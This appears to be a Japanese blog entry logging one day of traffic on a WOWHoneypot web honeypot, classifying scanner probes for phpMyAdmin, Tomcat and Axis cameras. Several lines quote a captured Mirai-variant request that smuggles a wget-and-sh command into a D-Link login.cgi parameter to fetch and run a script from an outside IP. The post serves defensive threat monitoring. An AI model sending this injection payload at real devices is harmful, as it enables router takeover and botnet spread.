WOWHoneypot簡易分析(23日目)
WOWhoneypotの2018/6/26(火)(運用23日目)の簡易分析です。
本日の総アクセス件数は121件です。
67 [2018-06-26 "HEAD /
45 [2018-06-26 "GET /
1 [2018-06-26 "GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 [2018-06-26 "GET /phpMyAdmin/scripts/setup.php
1 [2018-06-26 "GET /phpmyadmin/scripts/setup.php
1 [2018-06-26 "GET /pma/scripts/setup.php
1 [2018-06-26 "GET /myadmin/scripts/setup.php
1 [2018-06-26 "GET /MyAdmin/scripts/setup.php
1 [2018-06-26 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-26 "GET /manager/html
1 [2018-06-26 "GET /axis-cgi/jpg/image.cgi
あまり多くありませんね。
以下は全てスキャンツールZmEuによるスキャンです。
1 [2018-06-26 "GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 [2018-06-26 "GET /phpMyAdmin/scripts/setup.php
1 [2018-06-26 "GET /phpmyadmin/scripts/setup.php
1 [2018-06-26 "GET /pma/scripts/setup.php
1 [2018-06-26 "GET /myadmin/scripts/setup.php
1 [2018-06-26 "GET /MyAdmin/scripts/setup.php
その他のうち、以下は既知です。
GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ … ルータD-Linkの脆弱性を攻撃するMirai亜種
GET /manager/html … Tomcatの管理画面の調査行為
新たなログは以下です。
GET /axis-cgi/jpg/image.cgi HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51
Accept: */*
Referer: 1
このパスに対する脆弱性を調べたところ、Axis Communications社のネットワークカメラを狙った調査行為のようです。
とあるサイト曰く、以下のコメントがありました。
ハッカーは、他の人のポルノ写真を見るためにカメラに侵入するのが好きです。最も一般的なのは、AXISカメラをハイジャックすることです。
本日のハンティングログは以下です。Mirai亜種のみです。
1 [2018-06-26 wget hxxp://185.62.190[.]191/r
以上です。